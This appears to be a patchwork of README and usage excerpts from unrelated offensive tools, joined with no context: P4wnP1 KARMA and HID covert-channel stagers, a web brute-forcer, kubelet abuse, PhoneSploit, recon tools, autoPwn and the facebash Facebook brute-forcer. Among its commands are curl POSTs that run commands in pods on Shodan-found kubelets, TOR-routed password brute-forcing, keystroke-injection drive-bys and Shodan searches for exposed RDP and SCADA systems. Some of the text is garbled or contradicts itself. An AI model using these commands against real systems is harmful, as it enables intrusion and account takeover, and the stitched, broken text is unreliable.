Firmware configuration tool for KARMA modified nexmon WiFi firmware on Pi0W/Pi3 by MaMe82
=========================================================================================

RePo:       https://github.com/mame82/P4wnP1_nexmon_additions
Creds to:   seemoo-lab for "NEXMON" project

A hostapd based Access Point should be up and running, when using this tool
(see the README for details).

Usage:      python karmatool.py [Arguments]

Arguments:
   -h                   Print this help screen
   -i                   Interactive mode
   -d                   Load default configuration (KARMA on, KARMA beaconing off, 
                        beaconing for 13 common SSIDs on, custom SSIDs never expire)
   -c                   Print current KARMA firmware configuration
   -p 0/1               Disabl   e/Enable KARMA probe responses
   -a 0/1               Disable/Enable KARMA association responses
   -k 0/1               Disable/Enable KARMA association responses and probe responses
                        (overrides -p and -a)
   -b 0/1               Disable/Enable KARMA beaconing (broadcasts up to 20 SSIDs
                        spotted in probe requests as beacon)
   -s 0/1               Disable/Enable custom SSID beaconing (broadcasts up to 20 SSIDs
                        which have been added by the user with '--addssid=' when enabled)
   --addssid="test"     Add SSID "test" to custom SSID list (max 20 SSIDs)
   --remssid="test"     Remove SSID "test" from custom SSID list
   --clearssids         Clear list of custom SSIDs
   --clearkarma         Clear list of karma SSIDs (only influences beaconing, not probes)
   --autoremkarma=600   Auto remove KARMA SSIDs from beaconing list after sending 600 beacons
                           without receiving an association (about 60 seconds, 0 = beacon forever)
   --autoremcustom=3000    Auto remove custom SSIDs from beaconing list after sending 3000
                        beacons without receiving an association (about 5 minutes, 0 = beacon
                        forever)

Example:
   python karmatool.py -k 1 -b 0    Enables KARMA (probe and association responses)
                                    But sends no beacons for SSIDs from received probes
   python karmatool.py -k 1 -b 0    Enables KARMA (probe and association responses)
                                    and sends beacons for SSIDs from received probes
                                    (max 20 SSIDs, if autoremove isn't enabled)

   python karmatool.py --addssid="test 1" --addssid="test 2" -s 1
                                    Add SSID "test 1" and "test 2" and enable beaconing for
                                    custom SSIDs<   br/>

• a keystroke injection has to be applied to the target client to inject stage1
• stage1 loads stage2 over a (simplified version) of the HID covert channel, thus a special USB HID device has to be provided and a special HID covert channel server has to be started on P4wnP1, in order to provide stage2
• a second server has to be started and interface the modified WiFi firmware, in order to manage client connecting in via the WiFi covert channel and provide interactive shell access to those clients (the server is a console application which is meant to run in a terminal multiplexer, like screen)

• be a "weaponized" tool
• provide RTR payloads, which could be carried out by everybody, without understanding what's going on or which risks are involved

• be a flexible, low-cost, pocket sized platform
• serve as enabler for tasks like the one described here
• support prototyping, testing and carrying out all kinds of USB related tasks, commonly used during pentest or redteam engagements, without providing a finalized static solution

• drive-by against Windows hosts in order to deliver in-memory client code to download stage2 via HID covert channel, based on keystroke injection (HIDScript)
• starting the keystroke injection, as soon as P4wnP1 is connected to a USB host (TriggerAction issuing HIDScript)
• bring up the stager, which delivers the WiFi covert channel client agent via HID covert channel, as soon as the keystroke injection starts (TriggerAction running a bash script, which again starts the external server)
• bring up the WiFi covert channel server, when needed (same TriggerAction and BashScript)
• deploy a USB setup which provides a USB keyboard (to allow keystroke injection) and an additional raw HID device (serves as covert channel for stage2 delivery) - the USB settings are stored in a settings template
• deploy a WiFi setup, which allows remote access to P4wnP1, in order to allow interaction with the CLI frontend of the WiFi covert channel server - the WiFi settings are stored in a settings template
• provide a single point of entry, to deploy all the needed configurations at once (done by a Master Template, which consists of proper WiFi settings, proper USB settings and the TriggerActions needed to start the HIDScript)

• The bluetooth network interface, called bteth could be configured and templated like the other network interfaces (webclient or CLI)
• In order to allow NAP access from an Android mobile (iPhone untested), the mobile not only needs to connect, but additionally P4wnP1 has to hand out a proper IP for the default gateway on the bteth interface via DHCP. This is, because the mobile wants to use the NAP as gateway to the Internet (which would be the intended use). If the NAP itself wouldn't provide a gateway, the Android Mobile would do no further requests after the DHCP D.O.R.A. The easiest way to overcome this, is to instruct the DHCP server to provide the IP of the bteth interface itself as default gateway (DHCP option 3). Even if there is no real upstream connection, this worked during my tests - as the mobile has to access the gateway with layer3 communication in order to "phone home". Even if successive connectivity tests fail, the working layer 3 connection persists. This allows, for example, SSH access via Bluetooth. With "High Speed" enabled, the webclient works pretty nice, too.
• In order to allow PIN based pairing Simple Secure Pairing (SSP) has to be disabled. If SSP is enabled, the running Pairing agent confirms every passkey (which means even less security than with legacy PIN pairing, as every device is able to connect). Maybe a confirmation dialog for SSP based passkey pairing will be implemented for the CLI/webclient in future, but currently this is out of scope. I highly suggest to disable "discoverable" and "bondable" if SSP is in use, as soon as the intended device has paired.
• Another shortcoming of having SSP disabled, is that "High Speed" wouldn't be usable for bluetooth conections (or to enable High Speed, pairing has to be done with SSP). Without "High Speed" enabled (uses 802.11 frames for communication) it would take about 10 minutes to request the webclient, with high speed enabled it takes some seconds. Using SSH and the CLI client over a NAP without "High Speed" should be fine, though.
• The default Bluetooth network interface settings (bteth_startup) and the default Bluetooth settings (startup) should allow "Low Speed" access over SSH with legacy PIN pairing. The PIN is 1337 and could be changed from the webclient.

P4wnP1_cli trigger send --group-name=connected --group-value=1

• The WiFi AP is up
• P4wnP1 has been connected to a USB host

1. On "WiFi AP up" --> send value 1 to group "conditions"
2. On "attached to USB host" --> send value 2 to group "conditions"

• On "multiple values on group channel"; values (1,2); type "All (logical AND)" --> start bash script

P4wnP1_cli trigger wait --group-name=waitgroup --group-value=1

• HIDScript Trigger variables (variables handed in to HIDScripts fired from TriggerActions)
• HIDScript helpers (powershell functions)
• HIDScript demo snake (mouse)
• USB Mass storage (genimg helper)

• @JohanBrandhorst (close exchange on gRPC-web via gopherjs, ridiculous fast implementation of "websocket for server streaming", feature request)
• @steevdave, @_binkybear (kali build scripts, discussion ongoing exchange)
• @Re4sonKernel (Support on moving P4wnP1 kernel changes to a well maintained and popular repo, collaboration on Bluez fixes)
• @SymbianSyMoh (Inspiration for HID attack re-trigger without reboot)
• @quasarframework (could list this under 3rd party libs, but the work done here is insane; the look&feel of the P4wnP1 webclient is more or lees based on default components of this beautiful library)
• @CyberArms (one of the most early P4wnP1 supporters, writer of the best tutorial and even books on such topics)
• @LucaBongiorni (not only one of the earliest supporters, he does in hardware, what I'm only to do in software; he gives talks on the USB topic and honors Open Source solutions, all in all a great guy and an inspiration)
• @evilsocket (his block pushed me towards Go, a great OSS developer, read his code and you know what I mean)
• @RoganDawes and @Singe from @SensePost (inspiring guys)
• @Swiftb0y (Early supporter, creator of the "old" P4wnP1 WiKi, early tester for ideas on P4wnP1 A.L.O.A.)
• @marcaruel (discussion on GPIO edge detection using periph.io)

• Porting the full HID covert channel functionality to Go core (I'm on my own with that)
• add Bluetooth configuration command for CLI
• Create additional keyboard layouts (currently br, de, es, fr, gb, it, ru and us are supported)
• extend Bluetooth functionality to allow connection to other discoverable devices (authentication and trust)
• move WiFi KARMA functionality from dedicated python tool to P4wnP1 core (with webclient support))
• Create full documentation for HIDScript (basically only the mouse part is missing)
• Create full documentation for P4wnP1 (hoping for community)
• Get rid of a remaining dependency on the docker netlink (see README of the netlink folder)

• Multi-threading on demand
• Fuzzing, bruteforcing GET params
• Find admin panels
• Colored output
• Hide results by return code, word numbers
• Proxy support
• Big wordlist
• Colored

• Install

git clone https://github.com/ManhNho/brutality.git
chmod 755 -R brutality/
cd brutality/
pip install -r requirements.txt

• Helps

python brutality -h

• Use default wordlist with 5 threads (-t 5) and hide 404 messages (–e 404) to fuzz the given URL (http://192.168.1.1/FUZZ):

python brutality.py -u 'http://192.168.1.1/FUZZ' -t 5 -e 404

• Use common_pass.txt wordlist (-f ./wordlist/common_pass.txt), remove response with 6969 length (-r 6969) and proxy at 127.0.0.1:8080 (-p http://127.0.0.1:8080) to fuzz the given URL (http://192.168.1.1/brute.php?username=admin&password=FUZZ&submit=submit#):

python brutality.py -u 'http://192.168.1.1/brute.php?username=admin&password=FUZZ&submit=submit#' -f ./wordlist/common_pass.txt -r 6969 -p http://127.0.0.1:8080

// getRun handles requests to run a command inside a container.
func (s *Server) getRun(request *restful.Request, response *restful.Response) {
 params := getExecRequestParams(request)
 pod, ok := s.host.GetPodByName(params.podNamespace, params.podName)
 if !ok {
  response.WriteError(http.StatusNotFound, fmt.Errorf("pod does not exist"))
  return
 }

ssl:true port:10250 404

curl -k https://IP-from-Shodan:10250/runningpods/ 

curl -k https://IP-from-Shodan:10250/pods/
#or
curl http://IP-from-Shodan:10255/pods/ 

curl -XPOST -k https://IP-from-Shodan:10250/run/<namespace>/<PodName>/<containerName> -d "cmd=<command-to-run>" 

• asn
• org
• country
• net

mkdir output
pip install -r requirements.txt 

python kubolt.py --query "asn:123123 org:'ACME Corporation'"
#or
python kubolt.py --query "org:'ACME Corporation' country:UK"

extract adb.rar to the phonesploit directory 
git clone https://github.com/Zucccs/PhoneSploit
cd PhoneSploit
python2 main.py

• $ git clone https://github.com/webarx-security/wpbullet wpbullet
• $ cd wpbullet
• $ pip install -r requirements.txt
• $ python wpbullet.py

--path (required) System path or download URL 
Examples:
--path="/path/to/plugin"
--path="https://wordpress.org/plugins/example-plugin"
--path="https://downloads.wordpress.org/plugin/example-plugin.1.5.zip"

--enabled (optional) Check only for given modules, ex. --enabled="SQLInjection,CrossSiteScripting"
--disabled (optional) Don't check for given modules, ex. --disabled="SQLInjection,CrossSiteScripting"
--cleanup (optional) Automatically remove content of .temp folder after scanning remotely downloaded plugin

$ python wpbullet.py --path="/var/www/wp-content/plugins/plugin-name"

from core.modules import BaseClass


class ExampleVulnerability(object):

    # Vulnerability name
    name = "Cross-site Scripting"

    # Vulnerability severity
    severity = "Low-Medium"

    # Functions causing vulnerability
    functions = [
        "print"
        "echo"
    ]

    # Functions/regex that prevent exploitation
    blacklist = [
        "htmlspecialchars",
        "esc_attr"
    ]

import copy


...
# Build dynamic regex pattern to locate vulnerabilities in given content
def build_pattern(self, content, file):
    user_input = copy.deepcopy(self.user_input)

    variables = self.get_input_variables(self, content)

    if variables:
        user_input.extend(variables)

    if self.blacklist:
        blacklist_pattern = r"(?!(\s?)+(.*(" + '|'.join(self.blacklist) + ")))"
    else:
        blacklist_pattern = ""

    self.functions = [self.functions_prefix + x for x in self.functions]

    pattern = r"((" + '|'.join(self.functions) + ")\s{0,}\(?\s{0,1}" + blacklist_pattern + ".*(" + '|'.join(user_input) + ").*)"
    return pattern

• DNS: Basic enumeration, Brute forcing (upon request), Reverse DNS sweeping, Subdomain name alterations/permutations, Zone transfers (upon request)
• Scraping: Ask, Baidu, Bing, CommonCrawl, DNSDB, DNSDumpster, DNSTable, Dogpile, Exalead, FindSubdomains, Google, IPv4Info, Netcraft, PTRArchive, Riddler, SiteDossier, ThreatCrowd, VirusTotal, Yahoo
• Certificates: Active pulls (upon request), Censys, CertDB, CertSpotter, Crtsh, Entrust
• APIs: BinaryEdge, BufferOver, CIRCL, HackerTarget, PassiveTotal, Robtex, SecurityTrails, Shodan, Twitter, Umbrella, URLScan
• Web Archives: ArchiveIt, ArchiveToday, Arquivo, LoCArchive, OpenUKArchive, UKGovArchive, Wayback

sudo snap install amass

sudo apt install snapd
sudo systemctl start snapd
sudo systemctl enable snapd
sudo systemctl start apparmor
sudo systemctl enable apparmor

export PATH=$PATH:/snap/bin

sudo snap refresh

brew tap caffix/amass
brew install amass

1. Build the Docker image:

sudo docker build -t amass https://github.com/OWASP/Amass.git

2. Run the Docker image:

sudo docker run amass --passive -d example.com

sudo docker run amass -w /wordlists/all.txt -d example.com

1. Download OWASP Amass:

go get -u github.com/OWASP/Amass/...

2. If you wish to rebuild the binaries from the source code:

cd $GOPATH/src/github.com/OWASP/Amass

go install ./...

3. Several wordlists can be found in the following directory:

ls $GOPATH/src/github.com/OWASP/Amass/wordlists/

• OWASP: Caffix
• GitHub: @caffix

1. Install dependencies (Debian/Ubuntu):

sudo apt install python3 python3-pip

2. Install with pip3:

sudo -H pip3 install git+https://github.com/decoxviii/userrecon-py.git
userrecon-py --help

git clone https://github.com/decoxviii/userrecon-py.git ; cd userrecon-py
sudo -H pip3 install -r requirements.txt
python3 setup.py build
sudo python3 setup.py install

sudo -H pip3 install git+https://github.com/decoxviii/userrecon-py.git --upgrade
userrecon-py --version

userrecon-py target decoxviii -o test1

• Don't use your API key so you don't have to worry about litmit of API quotation.*
  
• Do query from command line without Premium account.*
  
• Get more result without Premium account. *
  
• But I have an Premium account why do I need this shit?
  
  • Again Metabigor will not lose your API quotation.
  • Your query will optimized so you gonna get more result than using it by hand or API key.
  • Never get duplicate result.*

• Shodan.
• Censys.
• Fofa Pro.

git clone https://github.com/j3ssie/Metabigor
cd Metabigor
pip3 install -r requirements.txt

./metabigor.py -s <source> -q '<your_query>' [options]

./metabigor.py -s fofa -q 'title="Dashboard - Confluence" && body=".org"' 

./metabigor.py -s fofa -q 'title="Dashboard - Confluence" && body=".org"' -b --disable_pages

./metabigor.py -s shodan -q 'port:"3389" os:"Windows"' --debug

[*] Setup session
===============
Do command below or direct modify config.conf file
./metabigor.py -s shodan --cookies=<content of polito cookie>
./metabigor.py -s censys --cookies=<content of auth_tkt cookie>
./metabigor.py -s fofa --cookies=<content of _fofapro_ars_session cookie>


[*] Basic Usage
===============
./metabigor.py -s <source> -q '<your_query>' [options]

[*] More Options
===============
  -d OUTDIR, --outdir OUTDIR
                        Directory output
  -o OUTPUT, --output OUTPUT
                        Output file name
  --raw RAW             Directory to store raw query
  --proxy PROXY         Proxy for doing request to search engine e.g:
                        http://127.0.0.1:8080
  -b                    Auto brute force the country code
  --disable_pages       Don't loop though the pages
  --store_content       Store the raw HTML souce or not
  --hh                  Print this message
  --debug               Print debug output


[*] Example commands
===============
./metabigor.py -s fofa -q 'title="Dashboard - Confluence" && body=".org"' -b
./metabigor.py -s fofa -q 'title="Dashboard - Confluence" && body=".org"' -b --disable_pages

./metabigor.py -s shodan -q 'port:"3389" os:"Windows"' --debug
./metabigor.py -s shodan -Q list_of_query.txt --debug -o rdp.txt

./metabigor.py -s censys -q '(scada) AND protocols: "502/modbus"' -o something  --debug --proxy socks4://127.0.0.1:9050

• Predine query to do specific task like subdomain scan, portscan
• Adding more search engine.
  • ZoomEye
  • Baidu

$ sudo docker pull bannsec/autoPwn
$ sudo docker run -it -v $PWD:/mount --security-opt="apparmor=unconfined" --cap-add=SYS_PTRACE bannsec/autoPwn

$ autoPwn ./file

usage: autoPwnCompile [-h] [--file FILE] [--ASAN | --MSAN] [--UBSAN]
                      [--fuzzer FUZZER]

Compile source to binaries for use in autoPwn.

optional arguments:
  -h, --help       show this help message and exit
  --file FILE      Single file to compile.
  --ASAN           Enable ASAN (default off)
  --MSAN           Enable MSAN (default off)
  --UBSAN          Enable UBSAN (default off)
  --fuzzer FUZZER  (optional) What fuzzer to compile for. Options are:
                   ['AFL']. Default is AFL.

1. Automate and simplify the task of starting the fuzzer through smart prompts
2. Automate and simplify the task of restarting the fuzzer through a config file
3. Fully automate the process of afl queue minimizations
4. Fully automate the process of extracting and minimizing all possible exploitable paths
5. Fully automate the process of extracting and minimizing all possible paths in general.
6. Fully or partially automate the generation of initial path values.

$ ./e67eb287f23011a40ef5bd5c2ad2f48ca97834cf 
Welcome! I don't think we're in Kansas anymore.
We're about to head off on an adventure!
Select some animals you want to bring along.

Menu Options:
1: Bring a lion
2: Bring a tiger
3: Bring a bear
4: Delete Animal
5: Exit

Enter your choice:
1
Choose the type of lion you want:
1: Congo Lion
2: Barbary Lion
1
Enter name of lion:
Test
Menu Options:
1: Bring a lion
2: Bring a tiger
3: Bring a bear
4: Delete Animal
5: Exit

Enter your choice:
5

$ cat in/1 
1
1
Test
5

$ autoPwn 
Setting up fuzz configuration
Target Binary (full or relative path): e67eb287f23011a40ef5bd5c2ad2f48ca97834cf
Command line args: 
Number of cores (default: 8): 
Test Case Dir (default: 'in/'): 
Test Case Dir (default: 'out/'): 
Max memory (default: 200): 4096
Starting fuzz
autoPwn> s
status check tool for afl-fuzz by 

Individual fuzzers
==================

>>> SESSION007 (0 days, 0 hrs) <<<

  cycle 1, lifetime speed 1 execs/sec, path 0/1 (0%)
  pending 1/1, coverage 0.15%, no crashes yet

>>> SESSION000 (0 days, 0 hrs) <<<

  cycle 1, lifetime speed 1 execs/sec, path 0/1 (0%)
  pending 1/1, coverage 0.15%, no crashes yet

>>> SESSION002 (0 days, 0 hrs) <<<

  cycle 1, lifetime speed 1 execs/sec, path 0/1 (0%)
  pending 1/1, coverage 0.15%, no crashes yet

>>> SESSION006 (0 days, 0 hrs) <<<

  cycle 1, lifetime speed 1 execs/sec, path 0/1 (0%)
  pending 1/1, coverage 0.15%, no crashes yet

>>> SESSION004 (0 days, 0 hrs) <<<

  cycle 1, lifetime speed 1 execs/sec, path 0/1 (0%)
  pending 1/1, coverage 0.15%, no crashes yet

>>> SESSION001 (0 days, 0 hrs) <<<

  cycle 1, lifetime speed 1 execs/sec, path 0/1 (0%)
  pending 1/1, coverage 0.15%, no crashes yet

>>> SESSION005 (0 days, 0 hrs) <<<

  cycle 1, lifetime speed 1 execs/sec, path 0/1 (0%)
  pending 1/1, coverage 0.15%, no crashes yet

>>> SESSION003 (0 days, 0 hrs) <<<

  cycle 1, lifetime speed 1 execs/sec, path 0/1 (0%)
  pending 1/1, coverage 0.15%, no crashes yet

Summary stats
=============

       Fuzzers alive : 8
      Total run time : 0 days, 0 hours
         Total execs : 0 million
    Cumulative speed : 8 execs/sec
       Pending paths : 8 faves, 8 total
  Pending per fuzzer : 1 faves, 1 total (on average)
       Crashes found : 0 locally unique


autoPwn> h
autoPwn
     s == fuzzer (s)tatus
     e == collect (e)xploits
     a == collect (a)ll paths
     m == (m)inimize corpus
     q == (q)uit

Facebook blocks account for 1 hour after 20 wrong passwords, so this script can perform only 20 pass/h.

• Save/Resume sessions
• Anonymous attack through TOR
• Default Password List (+39k)

git clone https://github.com/thelinuxchoice/facebash
cd instashell
chmod +x facebash.sh
service tor start
sudo ./facebash.sh

chmod +x install.sh
sudo ./install.sh